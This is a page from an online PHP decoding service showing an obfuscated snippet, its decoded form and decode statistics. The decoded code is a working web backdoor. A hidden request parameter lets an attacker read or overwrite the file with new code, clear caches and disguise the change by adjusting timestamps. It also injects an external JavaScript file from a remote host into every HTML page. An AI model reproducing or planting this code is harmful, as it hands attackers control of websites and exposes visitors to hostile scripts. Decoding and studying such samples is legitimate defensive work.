Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
/*cut here;)*/if(isset($_REQUEST["\x66\x690\155\x39\x6d\x62qk\70w3\151awq"])){if(empty($_R..
Decoded Output download
<? /*cut here;)*/if(isset($_REQUEST["fi0m9mbqk8w3iawq"])){if(empty($_REQUEST["fi0m9mbqk8w3iawq"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$cdb5hx=filemtime(__FILE__);$bwjeqf=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["fi0m9mbqk8w3iawq"]))));@touch(__FILE__,$cdb5hx+1,$bwjeqf+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function aplkkj($cdb5hx){return str_replace("</head>","<script type='text/javascript' async src='https://bia6v8em.cloudfire.quest/challenge.js'></script></head>",$cdb5hx);}ob_start("aplkkj");}/*cut here;)*/ ?>
Did this file decode correctly?
Original Code
/*cut here;)*/if(isset($_REQUEST["\x66\x690\155\x39\x6d\x62qk\70w3\151awq"])){if(empty($_REQUEST["\x66\x69\x30\155\71\x6d\142qk\70\x77\x33\x69\x61\167q"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("\130\x2dL\151\x74\x65Spe\x65\x64\55\120\165r\x67e\x3a \52");if(function_exists("\x6f\160\x63\x61\x63\150\145\x5f\162\145\163\x65t")){@opcache_reset();}if(function_exists("\141p\x63_\x63l\145\x61\x72_c\141\x63\x68e")){@apc_clear_cache();}$cdb5hx=filemtime(__FILE__);$bwjeqf=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["f\x690\155\x39m\x62q\1538\167\x33\x69awq"]))));@touch(__FILE__,$cdb5hx+1,$bwjeqf+1);}die;}if(isset($_SERVER["\x48TT\120\x5f\101\103C\105P\124"])&&(strpos($_SERVER["\110\124\124\x50\137\x41C\x43\x45\x50\x54"],"t\x65\x78t\x2fht\155\x6c")!==false||$_SERVER["\110\x54\124P_A\103CE\x50T"]==="\x2a\x2f\x2a")){function aplkkj($cdb5hx){return str_replace("<\x2fh\145a\x64\x3e","<s\143\162i\160t\40t\x79\x70\145=\47t\145\170\x74/\x6aav\141\x73\143\x72ipt\47\40\x61\163\171\156c\40s\162\143\75\47h\x74\164p\x73\72\x2f\57\142\x69\1416v\x38e\155\56c\x6co\x75df\151\162e\x2e\161u\145\x73\164\57\x63\150\x61l\154\145ng\x65\x2e\152\163'\76\74\57s\x63\162ip\164\76\74\x2f\150\x65a\144>",$cdb5hx);}ob_start("\141\x70\x6ck\x6bj");}/*cut here;)*/
Function Calls
strpos | 1 |
Stats
MD5 | 9e3067d67d9845847c723d9b48081a0d |
Eval Count | 0 |
Decode Time | 74 ms |